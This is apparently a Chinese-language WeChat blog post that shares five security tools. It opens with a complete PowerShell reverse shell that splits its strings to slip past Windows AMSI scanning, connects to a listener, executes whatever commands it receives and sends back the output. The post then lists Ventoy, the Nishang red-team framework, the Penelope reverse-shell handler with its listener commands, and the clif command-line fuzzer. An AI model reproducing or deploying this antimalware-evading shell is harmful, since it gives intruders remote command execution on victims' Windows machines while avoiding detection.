周六偷摸学习发现了一些有趣的工具/代码, 分享给大家.
-
简单的用来绕过AMSI(Windows Antimalware Scan Interface, Windows 反恶意软件扫描接口)的反弹shell, 适用于Powershell
$ip = '("127.0.0.1",'
$port = "1337)"
$socket ="New-Object"
$space = " "
$socket1 ="System.Net.Sockets.TCPClient"
$client2 = $socket+"$space"+"$socket1"
$client = "$client2"+"$ip"+"$port"
write-host $client
$client2 = iex $client
$stream = $client2.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2 = $sendback + "PS " + (pwd).Path + "> "
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client2.Close()
关于WASI的更多信息:
https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
2. https://github.com/ventoy/Ventoy
用于为 ISO/WIM/IMG/VHD(x)/EFI 文件创建可启动 USB 驱动器(好耶)
3. https://github.com/samratashok/nishang
Nishang 是一个框架以及脚本和exploit的集合,它支持使用 PowerShell 进行渗透测试,适用于红队攻击。Nishang 在渗透测试的所有阶段都很有用。
PS C:nishang> Import-Module .nishang.psm1
4. https://github.com/brightio/penelope
Penelope 是一个 shell 处理程序,旨在易于使用,旨在在利用 RCE 漏洞时取代 netcat。它与 Linux 和 macOS 兼容,需要 Python 3.6 或更高版本。它是一个独立的脚本,不需要任何安装或外部依赖项。
./penelope.py # Listening for reverse shells on 0.0.0.0:4444
./penelope.py -a # Listening for reverse shells on 0.0.0.0:4444 and show reverse shell payloads based on the current Listeners
./penelope.py 5555 # Listening for reverse shells on 0.0.0.0:5555
./penelope.py 5555 -i eth0 # Listening for reverse shells on eth0:5555
./penelope.py 1111 2222 3333 # Listening for reverse shells on 0.0.0.0:1111, 0.0.0.0:2222, 0.0.0.0:3333
./penelope.py -c target 3333 # Connect to a bind shell on target:3333
5. https://github.com/0x4ndy/clif
clif 是一个命令行界面 (CLI) 应用程序fuzzer,与用于 Web 的 wfuzz 或 ffuf 非常相似。
使用:
clif -e <executable> [-w <wordlist>, -n <number_range> -s <string_range>] -a "args_with_marks"
-e - executable
-w - wordlist
-a - arguments as string
-n - number range
-s - list of strings of 'A' a defined length range
例子:
# throw wordlist.txt as input
clif -e my_program -w wordlist.txt
# throw wordlist.txt as -p argument
clif -e my_program -w wordlist.txt -a "-p FUZZ"
# throw numbers from range 100..100000000 as the first argument
clif -e my_program -n 100..100000000 -a "-n FUZZ"
# throw a string with length from range 10..100 as the first argument
clif -e my_program -s 10..100
目前就暂时分享5个哈哈哈哈, 也是太久没有发公众号了, 很抱歉各位, 最近有想法会发文章, 但是不知道什么时候喽. 祝各位新春快乐.
这个好玩的系列不知道会不会继续下去, 如果各位喜欢这种系列的话可以点个赞或者直接快捷私信告诉我能够怎么优化, 感谢!
原文始发于微信公众号(Aaron与安全的那些事):Interesting things share, 来点好玩的
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论